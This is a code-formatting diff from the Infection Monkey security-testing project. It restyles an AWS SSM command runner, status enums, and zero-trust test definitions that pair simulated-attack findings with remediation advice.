||||||
|
|
||||||
def get_command_status(self, command_info):
|
def get_command_status(self, command_info):
|
||||||
if command_info['Status'] == 'InProgress':
|
if command_info["Status"] == "InProgress":
|
||||||
return CmdStatus.IN_PROGRESS
|
return CmdStatus.IN_PROGRESS
|
||||||
elif command_info['Status'] == 'Success':
|
elif command_info["Status"] == "Success":
|
||||||
return CmdStatus.SUCCESS
|
return CmdStatus.SUCCESS
|
||||||
else:
|
else:
|
||||||
return CmdStatus.FAILURE
|
return CmdStatus.FAILURE
|
||||||
|
|
||||||
def run_command_async(self, command_line):
|
def run_command_async(self, command_line):
|
||||||
doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
|
doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
|
||||||
command_res = self.ssm.send_command(DocumentName=doc_name, Parameters={'commands': [command_line]},
|
command_res = self.ssm.send_command(
|
||||||
InstanceIds=[self.instance_id])
|
DocumentName=doc_name,
|
||||||
return command_res['Command']['CommandId']
|
Parameters={"commands": [command_line]},
|
||||||
|
InstanceIds=[self.instance_id],
|
||||||
|
)
|
||||||
|
return command_res["Command"]["CommandId"]
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = "itay.mizeretz"
|
||||||
|
|
||||||
|
|
||||||
class Cmd(object):
|
class Cmd(object):
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = "itay.mizeretz"
|
||||||
|
|
||||||
|
|
||||||
class CmdResult(object):
|
class CmdResult(object):
|
||||||
|
|
|
@ -6,7 +6,7 @@ from common.cmd.cmd import Cmd
|
||||||
from common.cmd.cmd_result import CmdResult
|
from common.cmd.cmd_result import CmdResult
|
||||||
from common.cmd.cmd_status import CmdStatus
|
from common.cmd.cmd_status import CmdStatus
|
||||||
|
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = "itay.mizeretz"
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
@ -64,7 +64,7 @@ class CmdRunner(object):
|
||||||
command_result_pairs = CmdRunner.wait_commands(list(command_instance_dict.keys()))
|
command_result_pairs = CmdRunner.wait_commands(list(command_instance_dict.keys()))
|
||||||
for command, result in command_result_pairs:
|
for command, result in command_result_pairs:
|
||||||
instance = command_instance_dict[command]
|
instance = command_instance_dict[command]
|
||||||
instance_results[instance['instance_id']] = inst_n_cmd_res_to_res(instance, result)
|
instance_results[instance["instance_id"]] = inst_n_cmd_res_to_res(instance, result)
|
||||||
|
|
||||||
return instance_results
|
return instance_results
|
||||||
|
|
||||||
|
@ -91,7 +91,9 @@ class CmdRunner(object):
|
||||||
results = []
|
results = []
|
||||||
|
|
||||||
while (curr_time - init_time < timeout) and (len(commands) != 0):
|
while (curr_time - init_time < timeout) and (len(commands) != 0):
|
||||||
for command in list(commands): # list(commands) clones the list. We do so because we remove items inside
|
for command in list(
|
||||||
|
commands
|
||||||
|
): # list(commands) clones the list. We do so because we remove items inside
|
||||||
CmdRunner._process_command(command, commands, results, True)
|
CmdRunner._process_command(command, commands, results, True)
|
||||||
|
|
||||||
time.sleep(CmdRunner.WAIT_SLEEP_TIME)
|
time.sleep(CmdRunner.WAIT_SLEEP_TIME)
|
||||||
|
@ -102,8 +104,11 @@ class CmdRunner(object):
|
||||||
|
|
||||||
for command, result in results:
|
for command, result in results:
|
||||||
if not result.is_success:
|
if not result.is_success:
|
||||||
logger.error('The following command failed: `%s`. status code: %s',
|
logger.error(
|
||||||
str(command[1]), str(result.status_code))
|
"The following command failed: `%s`. status code: %s",
|
||||||
|
str(command[1]),
|
||||||
|
str(result.status_code),
|
||||||
|
)
|
||||||
|
|
||||||
return results
|
return results
|
||||||
|
|
||||||
|
@ -148,11 +153,13 @@ class CmdRunner(object):
|
||||||
c_id = command.cmd_id
|
c_id = command.cmd_id
|
||||||
try:
|
try:
|
||||||
command_info = c_runner.query_command(c_id)
|
command_info = c_runner.query_command(c_id)
|
||||||
if (not should_process_only_finished) or c_runner.get_command_status(command_info) != CmdStatus.IN_PROGRESS:
|
if (not should_process_only_finished) or c_runner.get_command_status(
|
||||||
|
command_info
|
||||||
|
) != CmdStatus.IN_PROGRESS:
|
||||||
commands.remove(command)
|
commands.remove(command)
|
||||||
results.append((command, c_runner.get_command_result(command_info)))
|
results.append((command, c_runner.get_command_result(command_info)))
|
||||||
except Exception:
|
except Exception:
|
||||||
logger.exception('Exception while querying command: `%s`', str(c_id))
|
logger.exception("Exception while querying command: `%s`", str(c_id))
|
||||||
if not should_process_only_finished:
|
if not should_process_only_finished:
|
||||||
commands.remove(command)
|
commands.remove(command)
|
||||||
results.append((command, CmdResult(False)))
|
results.append((command, CmdResult(False)))
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
from enum import Enum
|
from enum import Enum
|
||||||
|
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = "itay.mizeretz"
|
||||||
|
|
||||||
|
|
||||||
class CmdStatus(Enum):
|
class CmdStatus(Enum):
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
T1216_PBA_FILE_DOWNLOAD_PATH = '/api/t1216-pba/download'
|
T1216_PBA_FILE_DOWNLOAD_PATH = "/api/t1216-pba/download"
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
ES_SERVICE = 'elastic-search-9200'
|
ES_SERVICE = "elastic-search-9200"
|
||||||
|
|
|
@ -1,10 +1,10 @@
|
||||||
class TelemCategoryEnum:
|
class TelemCategoryEnum:
|
||||||
EXPLOIT = 'exploit'
|
EXPLOIT = "exploit"
|
||||||
POST_BREACH = 'post_breach'
|
POST_BREACH = "post_breach"
|
||||||
SCAN = 'scan'
|
SCAN = "scan"
|
||||||
SCOUTSUITE = 'scoutsuite'
|
SCOUTSUITE = "scoutsuite"
|
||||||
STATE = 'state'
|
STATE = "state"
|
||||||
SYSTEM_INFO = 'system_info'
|
SYSTEM_INFO = "system_info"
|
||||||
TRACE = 'trace'
|
TRACE = "trace"
|
||||||
TUNNEL = 'tunnel'
|
TUNNEL = "tunnel"
|
||||||
ATTACK = 'attack'
|
ATTACK = "attack"
|
||||||
|
|
|
@ -13,7 +13,15 @@ DEVICES = "Devices"
|
||||||
NETWORKS = "Networks"
|
NETWORKS = "Networks"
|
||||||
PEOPLE = "People"
|
PEOPLE = "People"
|
||||||
DATA = "Data"
|
DATA = "Data"
|
||||||
PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUTOMATION_ORCHESTRATION)
|
PILLARS = (
|
||||||
|
DATA,
|
||||||
|
PEOPLE,
|
||||||
|
NETWORKS,
|
||||||
|
DEVICES,
|
||||||
|
WORKLOADS,
|
||||||
|
VISIBILITY_ANALYTICS,
|
||||||
|
AUTOMATION_ORCHESTRATION,
|
||||||
|
)
|
||||||
|
|
||||||
STATUS_UNEXECUTED = "Unexecuted"
|
STATUS_UNEXECUTED = "Unexecuted"
|
||||||
STATUS_PASSED = "Passed"
|
STATUS_PASSED = "Passed"
|
||||||
|
@ -57,7 +65,7 @@ TESTS = (
|
||||||
TEST_SCOUTSUITE_SECURE_AUTHENTICATION,
|
TEST_SCOUTSUITE_SECURE_AUTHENTICATION,
|
||||||
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES,
|
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES,
|
||||||
TEST_SCOUTSUITE_LOGGING,
|
TEST_SCOUTSUITE_LOGGING,
|
||||||
TEST_SCOUTSUITE_SERVICE_SECURITY
|
TEST_SCOUTSUITE_SERVICE_SECURITY,
|
||||||
)
|
)
|
||||||
|
|
||||||
PRINCIPLE_DATA_CONFIDENTIALITY = "data_transit"
|
PRINCIPLE_DATA_CONFIDENTIALITY = "data_transit"
|
||||||
|
@ -78,10 +86,10 @@ PRINCIPLES = {
|
||||||
PRINCIPLE_DATA_CONFIDENTIALITY: "Ensure data's confidentiality by encrypting it.",
|
PRINCIPLE_DATA_CONFIDENTIALITY: "Ensure data's confidentiality by encrypting it.",
|
||||||
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.",
|
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.",
|
||||||
PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandatory "
|
PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandatory "
|
||||||
"Access Control) only.",
|
"Access Control) only.",
|
||||||
PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster recovery scenarios.",
|
PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster recovery scenarios.",
|
||||||
PRINCIPLE_SECURE_AUTHENTICATION: "Ensure secure authentication process's.",
|
PRINCIPLE_SECURE_AUTHENTICATION: "Ensure secure authentication process's.",
|
||||||
PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources."
|
PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources.",
|
||||||
}
|
}
|
||||||
|
|
||||||
POSSIBLE_STATUSES_KEY = "possible_statuses"
|
POSSIBLE_STATUSES_KEY = "possible_statuses"
|
||||||
|
@ -92,183 +100,183 @@ TEST_EXPLANATION_KEY = "explanation"
|
||||||
TESTS_MAP = {
|
TESTS_MAP = {
|
||||||
TEST_SEGMENTATION: {
|
TEST_SEGMENTATION: {
|
||||||
TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
|
TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
|
||||||
"running on, that belong to different network segments.",
|
"running on, that belong to different network segments.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
|
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
|
||||||
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."
|
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs.",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
|
PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
|
||||||
PILLARS_KEY: [NETWORKS],
|
PILLARS_KEY: [NETWORKS],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
|
||||||
},
|
},
|
||||||
TEST_MALICIOUS_ACTIVITY_TIMELINE: {
|
TEST_MALICIOUS_ACTIVITY_TIMELINE: {
|
||||||
TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
|
TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
|
||||||
"exploitation.",
|
"exploitation.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
|
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
|
PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
|
||||||
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
|
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
|
||||||
},
|
},
|
||||||
TEST_ENDPOINT_SECURITY_EXISTS: {
|
TEST_ENDPOINT_SECURITY_EXISTS: {
|
||||||
TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
|
TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
|
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
|
||||||
"software on endpoints.",
|
"software on endpoints.",
|
||||||
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
|
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
|
||||||
"security concern. "
|
"security concern. ",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
|
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
|
||||||
PILLARS_KEY: [DEVICES],
|
PILLARS_KEY: [DEVICES],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
|
||||||
},
|
},
|
||||||
TEST_MACHINE_EXPLOITED: {
|
TEST_MACHINE_EXPLOITED: {
|
||||||
TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
|
TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
|
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
|
||||||
"which endpoints were compromised.",
|
"which endpoints were compromised.",
|
||||||
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
|
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint.",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
|
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
|
||||||
PILLARS_KEY: [DEVICES],
|
PILLARS_KEY: [DEVICES],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
|
||||||
},
|
},
|
||||||
TEST_SCHEDULED_EXECUTION: {
|
TEST_SCHEDULED_EXECUTION: {
|
||||||
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
|
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
|
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
|
||||||
"software.",
|
"software.",
|
||||||
STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
|
STATUS_PASSED: "Monkey failed to execute in a scheduled manner.",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
|
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
|
||||||
PILLARS_KEY: [PEOPLE, NETWORKS],
|
PILLARS_KEY: [PEOPLE, NETWORKS],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
|
||||||
},
|
},
|
||||||
TEST_DATA_ENDPOINT_ELASTIC: {
|
TEST_DATA_ENDPOINT_ELASTIC: {
|
||||||
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
|
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
|
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
|
||||||
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
|
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
|
||||||
"that indicate attempts to access them. "
|
"that indicate attempts to access them. ",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
|
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
|
||||||
PILLARS_KEY: [DATA],
|
PILLARS_KEY: [DATA],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
|
||||||
},
|
},
|
||||||
TEST_DATA_ENDPOINT_HTTP: {
|
TEST_DATA_ENDPOINT_HTTP: {
|
||||||
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
|
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
|
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
|
||||||
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
|
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
|
||||||
"attempts to access them. "
|
"attempts to access them. ",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
|
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
|
||||||
PILLARS_KEY: [DATA],
|
PILLARS_KEY: [DATA],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
|
||||||
},
|
},
|
||||||
TEST_DATA_ENDPOINT_POSTGRESQL: {
|
TEST_DATA_ENDPOINT_POSTGRESQL: {
|
||||||
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to PostgreSQL servers.",
|
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to PostgreSQL servers.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting it in in-transit.",
|
STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting it in in-transit.",
|
||||||
STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, look for alerts that "
|
STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, look for alerts that "
|
||||||
"indicate attempts to access them. "
|
"indicate attempts to access them. ",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
|
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
|
||||||
PILLARS_KEY: [DATA],
|
PILLARS_KEY: [DATA],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
|
||||||
},
|
},
|
||||||
TEST_TUNNELING: {
|
TEST_TUNNELING: {
|
||||||
TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
|
TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
|
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
|
||||||
"restrict them. "
|
"restrict them. "
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
|
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
|
||||||
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
|
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED],
|
||||||
},
|
},
|
||||||
TEST_COMMUNICATE_AS_NEW_USER: {
|
TEST_COMMUNICATE_AS_NEW_USER: {
|
||||||
TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
|
TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
|
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
|
||||||
"restrict them to MAC only.",
|
"restrict them to MAC only.",
|
||||||
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network."
|
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network.",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
|
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
|
||||||
PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
|
PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
|
||||||
},
|
},
|
||||||
TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: {
|
TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: {
|
||||||
TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.",
|
TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.",
|
STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.",
|
||||||
STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules."
|
STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules.",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
|
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
|
||||||
PILLARS_KEY: [NETWORKS],
|
PILLARS_KEY: [NETWORKS],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
|
||||||
},
|
},
|
||||||
TEST_SCOUTSUITE_UNENCRYPTED_DATA: {
|
TEST_SCOUTSUITE_UNENCRYPTED_DATA: {
|
||||||
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing unencrypted data.",
|
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing unencrypted data.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_FAILED: "ScoutSuite found resources with unencrypted data.",
|
STATUS_FAILED: "ScoutSuite found resources with unencrypted data.",
|
||||||
STATUS_PASSED: "ScoutSuite found no resources with unencrypted data."
|
STATUS_PASSED: "ScoutSuite found no resources with unencrypted data.",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
|
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
|
||||||
PILLARS_KEY: [DATA],
|
PILLARS_KEY: [DATA],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
|
||||||
},
|
},
|
||||||
TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: {
|
TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: {
|
||||||
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not protected against data loss.",
|
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not protected against data loss.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_FAILED: "ScoutSuite found resources not protected against data loss.",
|
STATUS_FAILED: "ScoutSuite found resources not protected against data loss.",
|
||||||
STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss."
|
STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss.",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY,
|
PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY,
|
||||||
PILLARS_KEY: [DATA],
|
PILLARS_KEY: [DATA],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
|
||||||
},
|
},
|
||||||
TEST_SCOUTSUITE_SECURE_AUTHENTICATION: {
|
TEST_SCOUTSUITE_SECURE_AUTHENTICATION: {
|
||||||
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' authentication.",
|
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' authentication.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_FAILED: "ScoutSuite found issues related to users' authentication.",
|
STATUS_FAILED: "ScoutSuite found issues related to users' authentication.",
|
||||||
STATUS_PASSED: "ScoutSuite found no issues related to users' authentication."
|
STATUS_PASSED: "ScoutSuite found no issues related to users' authentication.",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION,
|
PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION,
|
||||||
PILLARS_KEY: [PEOPLE, WORKLOADS],
|
PILLARS_KEY: [PEOPLE, WORKLOADS],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
|
||||||
},
|
},
|
||||||
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: {
|
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: {
|
||||||
TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access policies.",
|
TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access policies.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
STATUS_FAILED: "ScoutSuite found permissive user access policies.",
|
STATUS_FAILED: "ScoutSuite found permissive user access policies.",
|
||||||
STATUS_PASSED: "ScoutSuite found no issues related to user access policies."
|
STATUS_PASSED: "ScoutSuite found no issues related to user access policies.",
|
||||||
},
|
},
|
||||||
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
|
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
|
||||||
PILLARS_KEY: [PEOPLE, WORKLOADS],
|
PILLARS_KEY: [PEOPLE, WORKLOADS],
|
||||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
|
||||||
},
|
},
|
||||||
TEST_SCOUTSUITE_LOGGING: {
|
TEST_SCOUTSUITE_LOGGING: {
|
||||||
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.",
|
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.",
|
||||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
